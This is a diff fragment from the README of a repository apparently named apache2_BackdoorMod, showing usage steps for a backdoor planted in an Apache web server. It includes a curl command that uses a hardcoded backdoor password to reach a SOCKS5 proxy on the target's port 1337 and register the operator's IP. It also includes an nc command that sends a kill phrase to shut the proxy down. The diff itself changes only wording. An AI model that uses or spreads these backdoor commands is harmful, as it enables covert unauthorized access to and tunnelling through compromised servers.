VladRico/apache2_BackdoorMod/README.md

 2. `curl -x socks5://vlad:password=backdoor@<TARGET>:1337 https://www.google.com` <br/>
 --> Register your IP address
 3. You could now use it without auth
-4. When you're done, you can kill the socks proxy by sending `imdonewithyou` in a new socket <br/>
+4. When you're done, you can kill the socks proxy by sending `imdonewithyou` in a socket <br/>
 --> `echo "imdonewithyou" | nc <TARGET> 1337`

 ### Ping module